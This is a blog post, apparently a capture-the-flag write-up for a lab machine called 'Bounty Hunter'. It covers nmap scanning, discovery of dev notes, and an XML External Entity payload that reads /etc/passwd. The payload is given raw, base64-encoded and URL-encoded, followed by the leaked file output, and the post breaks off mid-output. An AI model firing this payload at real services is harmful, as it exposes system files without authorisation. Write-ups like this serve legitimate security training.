{"id":533,"date":"2021-09-04T12:51:03","date_gmt":"2021-09-04T12:51:03","guid":{"rendered":"https:\/\/www.kylemoffat.ca\/?p=533"},"modified":"2022-02-07T21:05:44","modified_gmt":"2022-02-07T21:05:44","slug":"533","status":"publish","type":"post","link":"https:\/\/www.kylemoffat.ca\/index.php\/533\/","title":{"rendered":"Bounty Hunter"},"content":{"rendered":"<div class=\"fusion-fullwidth fullwidth-box fusion-builder-row-1 fusion-flex-container nonhundred-percent-fullwidth non-hundred-percent-height-scrolling\" style=\"background-color: rgba(255,255,255,0);background-position: center center;background-repeat: no-repeat;border-width: 0px 0px 0px 0px;border-color:#eae9e9;border-style:solid;\" ><div class=\"fusion-builder-row fusion-row fusion-flex-align-items-flex-start fusion-flex-justify-content-center\" style=\"max-width:104%;margin-left: calc(-4% \/ 2 );margin-right: calc(-4% \/ 2 );\"><div class=\"fusion-layout-column fusion_builder_column fusion-builder-column-0 fusion_builder_column_4_5 4_5 fusion-flex-column\"><div class=\"fusion-column-wrapper fusion-flex-justify-content-flex-start fusion-content-layout-column\" style=\"background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;padding: 0px 0px 0px 5%;\"><div style=\"text-align:center;\"><style>.element-bottomshadow.imageframe-1:before, .element-bottomshadow.imageframe-1:after{-webkit-box-shadow: 0 17px 10px rgba(0,0,0,0.4);box-shadow: 0 17px 10px rgba(0,0,0,0.4);}.awb-image-frame.awb-image-frame-1{ margin-bottom : 15px;}<\/style><div class=\"awb-image-frame awb-image-frame-1 fusion-image-frame-bottomshadow image-frame-shadow-1\"><span class=\" fusion-imageframe imageframe-bottomshadow imageframe-1 element-bottomshadow hover-type-none\"><img decoding=\"async\" width=\"300\" height=\"134\" alt=\"bounty_hunter_logo\" title=\"bounty_hunter_logo\" src=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/bounty_hunter_logo.png\" data-orig-src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/bounty_hunter_logo-300x134.png\" class=\"lazyload img-responsive wp-image-378\" srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%27308%27%20height%3D%27138%27%20viewBox%3D%270%200%20308%20138%27%3E%3Crect%20width%3D%27308%27%20height%3D%27138%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" data-srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/bounty_hunter_logo-200x90.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/bounty_hunter_logo.png 308w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 300px\" \/><\/span><\/div><\/div><div class=\"fusion-separator fusion-full-width-sep\" style=\"align-self: center;margin-left: auto;margin-right: auto;width:100%;\"><div class=\"fusion-separator-border sep-single sep-dashed\" style=\"border-color:#f4ad24;border-top-width:1px;\"><\/div><\/div><style type=\"text\/css\">@media only screen and (max-width:1024px) {.fusion-title.fusion-title-1{margin-top:10px!important; margin-right:0px!important;margin-bottom:31px!important;margin-left:0px!important;}}@media only screen and (max-width:640px) {.fusion-title.fusion-title-1{margin-top:0px!important; margin-right:0px!important;margin-bottom:20px!important; margin-left:0px!important;}}<\/style><div class=\"fusion-title title fusion-title-1 fusion-title-text fusion-title-size-four\" style=\"margin-top:10px;margin-right:0px;margin-bottom:31px;margin-left:0px;\"><div class=\"title-sep-container title-sep-container-left fusion-no-large-visibility fusion-no-medium-visibility fusion-no-small-visibility\"><div class=\"title-sep sep-\" style=\"border-color:#e0dede;\"><\/div><\/div><span class=\"awb-title-spacer fusion-no-large-visibility fusion-no-medium-visibility fusion-no-small-visibility\"><\/span><h4 class=\"title-heading-left fusion-responsive-typography-calculated\" style=\"margin:0;--fontSize:18;--minFontSize:18px;line-height:1.5;\">NMAP<\/h4><span class=\"awb-title-spacer\"><\/span><div class=\"title-sep-container title-sep-container-right\"><div class=\"title-sep sep-\" style=\"border-color:#e0dede;\"><\/div><\/div><\/div><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-1 > .CodeMirror, .fusion-syntax-highlighter-1 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-1 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-1 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-1 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_1\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_1\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/txt\">PORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)\n|   256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)\n|_  256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))\n|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\n|_http-title: Bounty Hunters\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/textarea><\/div><style type=\"text\/css\">@media only screen and (max-width:1024px) {.fusion-title.fusion-title-2{margin-top:10px!important; margin-right:0px!important;margin-bottom:31px!important;margin-left:0px!important;}}@media only screen and (max-width:640px) {.fusion-title.fusion-title-2{margin-top:0px!important; margin-right:0px!important;margin-bottom:20px!important; margin-left:0px!important;}}<\/style><div class=\"fusion-title title fusion-title-2 fusion-title-text fusion-title-size-four\" style=\"margin-top:10px;margin-right:0px;margin-bottom:31px;margin-left:0px;\"><div class=\"title-sep-container title-sep-container-left fusion-no-large-visibility fusion-no-medium-visibility fusion-no-small-visibility\"><div class=\"title-sep sep-\" style=\"border-color:#e0dede;\"><\/div><\/div><span class=\"awb-title-spacer fusion-no-large-visibility fusion-no-medium-visibility fusion-no-small-visibility\"><\/span><h4 class=\"title-heading-left fusion-responsive-typography-calculated\" style=\"margin:0;--fontSize:18;--minFontSize:18px;line-height:1.5;\">ENUMERATION<\/h4><span class=\"awb-title-spacer\"><\/span><div class=\"title-sep-container title-sep-container-right\"><div class=\"title-sep sep-\" style=\"border-color:#e0dede;\"><\/div><\/div><\/div><div class=\"fusion-text fusion-text-1\"><p class=\"graf graf--p\">When we first hit the page we are presented with a page that mentions \u201cSecurity Researchers can use Burp\u201d<\/p>\n<\/div><div style=\"text-align:center;\"><span class=\" fusion-imageframe imageframe-none imageframe-2 hover-type-none\" style=\"max-width:1300px;\"><img decoding=\"async\" width=\"1024\" height=\"513\" title=\"1\" src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/1-1024x513.png\" alt class=\"img-responsive wp-image-391 disable-lazyload\" srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/1-200x100.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/1-400x200.png 400w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/1-600x300.png 600w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/1-800x401.png 800w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/1-1200x601.png 1200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/1.png 1382w\" sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 1024px\" \/><\/span><\/div><div class=\"fusion-text fusion-text-2\" style=\"margin-top:10px;\"><p class=\"graf graf--p\">After some fuzzing and browsing around we find a directory listing with a handful of files in it but one contains some dev notes.<\/p>\n<\/div><div style=\"text-align:center;\"><span class=\" fusion-imageframe imageframe-none imageframe-3 hover-type-none\"><img decoding=\"async\" width=\"1024\" height=\"520\" title=\"2\" src=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/2-1.png\" data-orig-src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/2-1-1024x520.png\" alt class=\"lazyload img-responsive wp-image-396\" srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%271135%27%20height%3D%27576%27%20viewBox%3D%270%200%201135%20576%27%3E%3Crect%20width%3D%271135%27%20height%3D%27576%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" data-srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/2-1-200x101.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/2-1-400x203.png 400w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/2-1-600x304.png 600w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/2-1-800x406.png 800w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/2-1.png 1135w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 1024px\" \/><\/span><\/div><div class=\"fusion-text fusion-text-3\"><p>Dev notes \/ Tasks list (really not helpful here):<\/p>\n<span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">http:\/\/10.129.193.21\/resources\/README.txt<\/span>\n<\/div><div style=\"text-align:center;\"><span class=\" fusion-imageframe imageframe-none imageframe-4 hover-type-none\"><img decoding=\"async\" width=\"891\" height=\"276\" title=\"3\" src=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/3.png\" data-orig-src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/3.png\" alt class=\"lazyload img-responsive wp-image-403\" srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%27891%27%20height%3D%27276%27%20viewBox%3D%270%200%20891%20276%27%3E%3Crect%20width%3D%27891%27%20height%3D%27276%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" data-srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/3-200x62.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/3-400x124.png 400w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/3-600x186.png 600w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/3-800x248.png 800w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/3.png 891w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 891px\" \/><\/span><\/div><div class=\"fusion-text fusion-text-4\"><p>The <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">bountylog.js <\/span> file indicates that we may be able to use an XML External Entity attack!<span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">http:\/\/10.129.193.21\/resources\/bountylog.js<\/span><\/p>\n<\/div><div style=\"text-align:center;\"><span class=\" fusion-imageframe imageframe-none imageframe-5 hover-type-none\"><img decoding=\"async\" width=\"1024\" height=\"435\" title=\"4\" src=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/4.png\" data-orig-src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/4-1024x435.png\" alt class=\"lazyload img-responsive wp-image-404\" srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%271135%27%20height%3D%27482%27%20viewBox%3D%270%200%201135%20482%27%3E%3Crect%20width%3D%271135%27%20height%3D%27482%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" data-srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/4-200x85.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/4-400x170.png 400w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/4-600x255.png 600w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/4-800x340.png 800w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/4.png 1135w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 1024px\" \/><\/span><\/div><div class=\"fusion-separator fusion-full-width-sep\" style=\"align-self: center;margin-left: auto;margin-right: auto;margin-top:10px;width:100%;\"><div class=\"fusion-separator-border sep-single sep-dashed\" style=\"border-color:#f4ad24;border-top-width:1px;\"><\/div><\/div><style type=\"text\/css\">@media only screen and (max-width:1024px) {.fusion-title.fusion-title-3{margin-top:15px!important; margin-right:0px!important;margin-bottom:31px!important;margin-left:0px!important;}}@media only screen and (max-width:640px) {.fusion-title.fusion-title-3{margin-top:0px!important; margin-right:0px!important;margin-bottom:20px!important; margin-left:0px!important;}}<\/style><div class=\"fusion-title title fusion-title-3 fusion-title-text fusion-title-size-four\" style=\"margin-top:15px;margin-right:0px;margin-bottom:31px;margin-left:0px;\"><div class=\"title-sep-container title-sep-container-left fusion-no-large-visibility fusion-no-medium-visibility fusion-no-small-visibility\"><div class=\"title-sep sep-\" style=\"border-color:#e0dede;\"><\/div><\/div><span class=\"awb-title-spacer fusion-no-large-visibility fusion-no-medium-visibility fusion-no-small-visibility\"><\/span><h4 class=\"title-heading-left fusion-responsive-typography-calculated\" style=\"margin:0;--fontSize:18;--minFontSize:18px;line-height:1.5;\">USER<\/h4><span class=\"awb-title-spacer\"><\/span><div class=\"title-sep-container title-sep-container-right\"><div class=\"title-sep sep-\" style=\"border-color:#e0dede;\"><\/div><\/div><\/div><div class=\"fusion-text fusion-text-5\"><p>When reviewing the <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">POST<\/span> request made to <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">http:\/\/10.129.193.21\/tracker_diRbPr00f314.php<\/span> which occurs when clicking the Submit button on <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">http:\/\/10.129.193.21\/log_submit.php<\/span> we see there is a data parameter that is sent if we catch this in burp:<\/p>\n<\/div><div style=\"text-align:center;\"><span class=\" fusion-imageframe imageframe-none imageframe-6 hover-type-none\"><img decoding=\"async\" width=\"870\" height=\"349\" title=\"5\" src=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/5.png\" data-orig-src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/5.png\" alt class=\"lazyload img-responsive wp-image-414\" srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%27870%27%20height%3D%27349%27%20viewBox%3D%270%200%20870%20349%27%3E%3Crect%20width%3D%27870%27%20height%3D%27349%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" data-srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/5-200x80.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/5-400x160.png 400w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/5-600x241.png 600w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/5-800x321.png 800w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/5.png 870w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 870px\" \/><\/span><\/div><div class=\"fusion-text fusion-text-6\" style=\"margin-top:10px;\"><p>So this looks like base64 but it is noticeable that there is some <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">URL Encoding<\/span> going on here as well hence the <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">%2B<\/span> occurring as the last item in the above <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">data<\/span> parameter. Highlight the data, and remove the URL Encoding using <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">Ctrl+Shift-U<\/span> and then decode the base64 from that output using <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">Ctrl+Shift-B<\/span>.<\/p>\n<p>This presents us with:<\/p>\n<\/div><div style=\"text-align:center;\"><span class=\" fusion-imageframe imageframe-none imageframe-7 hover-type-none\"><img decoding=\"async\" width=\"759\" height=\"413\" title=\"6\" src=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/6.png\" data-orig-src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/6.png\" alt class=\"lazyload img-responsive wp-image-416\" srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%27759%27%20height%3D%27413%27%20viewBox%3D%270%200%20759%20413%27%3E%3Crect%20width%3D%27759%27%20height%3D%27413%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" data-srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/6-200x109.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/6-400x218.png 400w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/6-600x326.png 600w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/6.png 759w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 759px\" \/><\/span><\/div><div class=\"fusion-text fusion-text-7\" style=\"margin-top:10px;\"><p>Now let\u2019s have a look at how we can utilize an XXE attack against this input! Having a look at: <a href=\"https:\/\/owasp.org\/www-community\/vulnerabilities\/XML_External_Entity_(XXE)_Processing\">https:\/\/owasp.org\/www-community\/vulnerabilities\/XML_External_Entity_(XXE)_Processing<\/a>, we can utilize a basic XXE payload from here.<br \/>\nAs a proof of concept which we will end up using later, utilizing the following payload:<\/p>\n<\/div><div class=\"fusion-text fusion-text-8\"><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-2 > .CodeMirror, .fusion-syntax-highlighter-2 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-2 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-2 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-2 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_2\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_2\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/html\">data=<?xml version=\"1.0\"?>\n<!DOCTYPE foo [\n\t<!ELEMENT foo ANY >\n\t<!ENTITY file SYSTEM \"file:\/\/\/etc\/passwd\" >]>\n\t<bugreport>\n\t\t<title>`&file;`<\/title>\n\t\t<cwe><\/cwe>\n\t\t<cvss><\/cvss>\n\t\t<reward><\/reward>\n\t<\/bugreport><\/textarea><\/div>\n<\/div><div class=\"fusion-text fusion-text-9\" style=\"margin-top:10px;\"><p>Base64 encoded:<\/p>\n<\/div><div class=\"fusion-text fusion-text-10\"><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-3 > .CodeMirror, .fusion-syntax-highlighter-3 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-3 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-3 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-3 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_3\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_3\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/html\">data=PD94bWwgIHZlcnNpb249IjEuMCI\/Pgo8IURPQ1RZUEUgZm9vIFsKICAgPCFFTEVNRU5UIGZvbyBBTlkgPgogICA8IUVOVElUWSBmaWxlIFNZU1RFTSAgImZpbGU6Ly8vZXRjL3Bhc3N3ZCIgPl0+CiAgICAgICAgPGJ1Z3JlcG9ydD4KICAgICAgICA8dGl0bGU+YCZmaWxlO2A8L3RpdGxlPgogICAgICAgIDxjd2U+PC9jd2U+CiAgICAgICAgPGN2c3M+PC9jdnNzPgogICAgICAgIDxyZXdhcmQ+PC9yZXdhcmQ+CiAgICAgICAgPC9idWdyZXBvcnQ+<\/textarea><\/div>\n<\/div><div class=\"fusion-text fusion-text-11\" style=\"margin-top:10px;\"><p>URL encoded:<\/p>\n<\/div><div class=\"fusion-text fusion-text-12\"><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-4 > .CodeMirror, .fusion-syntax-highlighter-4 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-4 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-4 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-4 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_4\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_4\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/html\">data=PD94bWwgIHZlcnNpb249IjEuMCI\/Pgo8IURPQ1RZUEUgZm9vIFsKICAgPCFFTEVNRU5UIGZvbyBBTlkgPgogICA8IUVOVElUWSBmaWxlIFNZU1RFTSAgImZpbGU6Ly8vZXRjL3Bhc3N3ZCIgPl0%2bCiAgICAgICAgPGJ1Z3JlcG9ydD4KICAgICAgICA8dGl0bGU%2bYCZmaWxlO2A8L3RpdGxlPgogICAgICAgIDxjd2U%2bPC9jd2U%2bCiAgICAgICAgPGN2c3M%2bPC9jdnNzPgogICAgICAgIDxyZXdhcmQ%2bPC9yZXdhcmQ%2bCiAgICAgICAgPC9idWdyZXBvcnQ%2b<\/textarea><\/div>\n<\/div><div class=\"fusion-text fusion-text-13\" style=\"margin-top:10px;\"><p>Provides us with the <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">\/etc\/passwd<\/span> file in the <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">&lt;title&gt;<\/span> block<\/p>\n<\/div><div style=\"text-align:center;\"><span class=\" fusion-imageframe imageframe-none imageframe-8 hover-type-none\"><img decoding=\"async\" width=\"1024\" height=\"473\" title=\"7\" src=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/7.png\" data-orig-src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/7-1024x473.png\" alt class=\"lazyload img-responsive wp-image-420\" srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%271738%27%20height%3D%27803%27%20viewBox%3D%270%200%201738%20803%27%3E%3Crect%20width%3D%271738%27%20height%3D%27803%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" data-srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/7-200x92.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/7-400x185.png 400w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/7-600x277.png 600w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/7-800x370.png 800w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/7-1200x554.png 1200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/7.png 1738w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 1024px\" \/><\/span><\/div><div class=\"fusion-text fusion-text-14\" style=\"margin-top:10px;\"><p><span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">\/etc\/passwd<\/span> :<\/p>\n<\/div><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-5 > .CodeMirror, .fusion-syntax-highlighter-5 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-5 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-5 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-5 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_5\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_5\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/x-sh\">root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System\n(admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:100:102:systemd Network\nManagement,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:101:103:systemd\nResolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-timesync:x:102:104:systemd 